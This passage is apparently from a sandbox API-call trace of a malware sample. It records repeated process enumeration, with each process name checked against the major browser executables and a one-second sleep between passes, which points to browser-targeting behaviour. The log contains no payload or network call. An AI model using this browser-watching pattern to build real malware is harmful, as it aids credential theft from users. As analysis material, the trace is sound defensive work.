(lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0258.116] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.116] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.116] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.116] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.116] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.116] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.116] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.117] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0258.117] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0258.117] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0258.117] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0258.117] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.117] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.117] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.117] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.117] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.117] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.117] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0258.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0258.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0258.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0258.118] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.118] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.118] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.118] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.118] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.119] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0258.119] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0258.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0258.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0258.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0258.119] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.119] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0258.120] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.120] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.121] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.121] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.122] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0258.122] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.122] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0258.122] CloseHandle (hObject=0xe8) returned 1 [0258.122] Sleep (dwMilliseconds=0x3e8) [0259.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0259.150] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.150] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0259.150] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0259.150] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0259.150] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0259.150] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0259.150] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.151] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0259.151] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0259.151] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0259.151] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0259.151] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0259.151] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.151] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0259.151] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0259.151] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0259.151] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0259.151] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.151] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.152] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0259.152] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0259.152] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0259.152] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0259.152] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.152] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.152] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0259.152] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0259.152] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0259.152] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0259.153] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.153] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.153] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0259.153] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0259.153] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0259.153] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0259.153] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.153] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0259.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0259.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0259.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0259.154] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.154] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.154] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0259.154] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0259.154] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0259.154] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0259.154] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.154] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.155] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0259.155] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0259.155] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0259.155] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0259.155] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.155] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0259.155] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0259.155] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0259.155] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0259.155] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0259.155] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.155] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.156] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.156] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.156] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.156] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.156] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.156] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.157] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.157] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.157] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.158] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.158] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.158] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.159] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0259.159] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0259.159] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0259.159] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0259.159] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.159] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.159] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.159] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.159] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.159] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.160] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.160] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.160] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.160] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.160] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.160] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.160] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.160] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.161] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0259.161] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0259.161] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0259.161] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0259.161] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.161] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.161] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0259.161] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0259.161] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0259.161] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0259.161] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.161] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.162] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0259.162] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0259.162] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0259.162] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0259.162] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.162] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.162] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.162] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.162] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.162] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.162] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.162] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0259.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0259.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0259.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0259.163] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.163] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0259.163] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0259.163] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0259.163] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0259.164] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0259.164] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.164] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0259.164] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0259.164] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0259.164] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0259.164] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0259.164] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.164] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0259.165] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0259.165] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0259.165] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0259.165] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0259.165] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, 